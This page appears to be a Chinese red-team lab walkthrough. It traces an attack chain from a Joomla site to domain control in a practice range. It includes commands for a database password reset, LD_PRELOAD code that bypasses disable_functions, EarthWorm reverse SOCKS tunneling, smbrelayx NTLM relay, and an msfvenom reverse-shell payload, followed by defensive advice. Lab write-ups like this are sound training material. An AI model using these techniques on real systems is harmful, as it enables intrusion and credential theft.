当前位置: 首页 > news >正文

从Joomla到内网漫游:一次完整的ATKCK红队靶场实战复盘(含EarthWorm代理与NTLM Relay)

news 2026/5/1 2:37:24

红队实战:从Web渗透到内网横向移动的完整攻击链解析

当安全团队试图评估企业网络防御体系时,红队演练已成为检验安全防护有效性的黄金标准。本文将深入剖析一次典型的红队渗透过程,展示攻击者如何从外部Web应用漏洞入手,逐步突破边界防御,最终实现内网全域控制。不同于简单的工具罗列,我们更关注攻击者的思考逻辑和技术决策过程。

1. 目标侦察与初始访问

任何成功的渗透都始于充分的信息收集。攻击者首先会对目标网络进行系统化的侦察:

nmap -sS -A 192.168.43.57

扫描结果显示目标开放了22(SSH)、80(HTTP)和3306(MySQL)端口。Web服务运行的是Joomla 3.9.12,这个版本存在已知漏洞。使用专用扫描工具进一步确认:

joomscan -u http://192.168.43.57

关键发现

  • 配置文件备份/configuration.php~暴露了数据库凭据
  • MySQL服务允许远程连接,使用弱密码"cvcvgjASD!@"
  • 管理员账户密码可通过数据库直接修改

攻击者选择通过MySQL注入修改管理员密码,获取后台访问权限:

UPDATE am2zu_users SET password = MD5('123456') WHERE id = 891;

2. 权限提升与持久化

获得Web后台控制权后,攻击者尝试上传Webshell。选择/templates/beez3/目录上传PHP后门文件,因为模板目录通常具有写权限且不会被常规安全扫描重点关注。

然而执行系统命令时遇到障碍:

system('id'); // 返回空白

检查phpinfo()发现disable_functions限制了危险函数。此时采用LD_PRELOAD技术绕过限制:

  1. 上传预编译的bypass_disablefunc.so文件
  2. 通过特定环境变量加载该库
  3. 劫持库函数调用执行任意命令
// bypass_disablefunc.c 关键代码 void _init(void) { unsetenv("LD_PRELOAD"); system("/bin/sh -c '你的命令'"); }

编译并上传后,通过以下方式执行:

LD_PRELOAD=/tmp/bypass.so php -r "//"

3. 内网侦察与代理搭建

获得初始立足点后,攻击者开始内网信息收集:

命令用途示例输出
ifconfig查看网络接口eth0: 192.168.93.100
arp -a发现邻近主机192.168.93.1-254
netstat -tulnp检查本地服务3306, 22等

发现内网存在多个网段后,攻击者部署EarthWorm建立Socks5代理通道:

# 攻击机(监听) ./ew -s rcsocks -l 1080 -e 8888 # 目标机(连接) ./ew -s rssocks -d 攻击机IP -e 8888

配置Proxychains使所有工具通过代理工作:

# /etc/proxychains.conf socks5 127.0.0.1 1080

4. 横向移动与权限维持

在内网中,攻击者采用NTLM Relay技术突破Windows域环境:

  1. 使用Impacket工具包搭建恶意SMB服务器
  2. 诱使域内主机向该服务器发起认证
  3. 中继认证信息到目标服务器
python3 smbrelayx.py -h 目标IP -e /tmp/shell.exe

攻击链关键点

  • 利用MSF生成Windows载荷
  • 通过SMB服务传递执行载荷
  • 获取高权限会话后提取凭据
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe -o shell.exe

成功中继认证后,攻击者获得域管理员权限,可进行以下操作:

  • 转储所有域用户哈希
  • 创建黄金票据
  • 部署持久化后门
  • 访问敏感数据存储

5. 痕迹清理与防御建议

专业红队会在演练后清理攻击痕迹,但真实攻击者往往不会。企业可采取以下防御措施:

即时检测点

  • 异常的LD_PRELOAD使用
  • 非常规端口上的Socks流量
  • NTLM认证日志中的异常源IP
  • 同一凭据在多主机上的使用

长期加固建议

  1. Web应用:

    • 定期更新CMS和插件
    • 限制配置文件访问权限
    • 实施严格的输入过滤

  2. 内网防护:

    • 启用SMB签名
    • 限制NTLM使用
    • 部署网络分段

  3. 监控体系:

    • 建立基线行为模型
    • 部署EDR解决方案
    • 设置关键操作告警

这场演练展示了现代网络攻击的复杂性和连贯性。从最初的Web漏洞到最终获取域控权限,攻击者充分利用了每个环节的弱点。防御者需要理解,真正的安全不在于阻断每一个可能的攻击入口,而在于建立能够快速检测和响应入侵的多层防御体系。

http://www.jsqmd.com/news/728964/

相关文章:

  • SAM的3D平替来了?手把手教你用SAGA给3D高斯场景做‘CT扫描’(支持点、涂鸦、Mask)
  • 低代码/无代码革命:软件测试从业者的机遇与挑战
  • 金融领域LLM应用中的偏见挑战与模块化解决方案
  • Transformer与CNN的‘和解’方案:深入浅出图解ViT Adapter的特征融合魔法
  • Proteus 8.15仿真STM32F103C8,ADC采样总为0?试试换成C6型号(附完整CubeMX配置)
  • SPARK SR1120 UWB芯片:超低功耗与高性能的完美结合
  • PIC16F17576微控制器低功耗与模拟外设应用解析
  • 从Jupyter Notebook到Airflow DAG:R脚本工业化改造的6步法,实现偏见日志自动归档+偏差热力图秒级推送
  • 2026乐山跷脚牛肉加盟选品推荐:跷脚牛肉品牌加盟,跷脚牛肉品牌加盟哪家好,跷脚牛肉品牌加盟推荐哪家,优选指南! - 优质品牌商家
  • 终极图表数据提取指南:如何用WebPlotDigitizer快速获取图表中的原始数据
  • 从‘永久化学品’PFAS的治理难题,看环境工程中的高级氧化与活性炭吸附技术实战
  • SAP ABAP开发避坑指南:COMMIT WORK和COMMIT WORK AND WAIT到底怎么选?
  • 华三路由器NAT配置
  • 2026年芯片载盘厂家TOP5技术实力实测对比解析 - 优质品牌商家
  • R语言如何量化大模型偏见?3类核心统计检验(KS/Z/Mann-Whitney)在GPU集群上的实时落地全链路
  • 统信UOS桌面版办公效率提升指南:从搜狗输入法配置到WPS模板库的完整工作流
  • Topton N1双盘位NAS评测:AMD 3050e与四网口存储方案
  • 芯片展会哪家好?多维度测评芯片行业展会,挑选高价值专业参展盛会 - 品牌2026
  • 体验 Taotoken 多模型聚合路由带来的高可用与低延迟
  • 从‘Node-to-Segment’到代码:一个Matlab小白的接触有限元编程入门笔记
  • AI助力工业厂房火灾报警系统改造
  • Qt表格美化避坑指南:用QSS让QTableWidget告别‘默认丑’,实现现代化UI(附常用样式表)
  • 开源MIT协议90度半边脸识别性别android方案
  • 终极指南:三步掌握微信聊天记录永久保存与智能分析
  • 云成本优化:每年为公司省下百万的架构设计技巧
  • 2026年4月大连名酒回收机构排行:靠谱之选盘点 - 优质品牌商家
  • FITC标记的Siglec-2/CD22 Fc嵌合蛋白在B细胞免疫治疗研究中的应用
  • 手持式雷达测速仪 车辆测速仪
  • SparkVSR技术解析:交互式视频超分辨率革命
  • 简约而不简单:快捷记账产品设计理念分析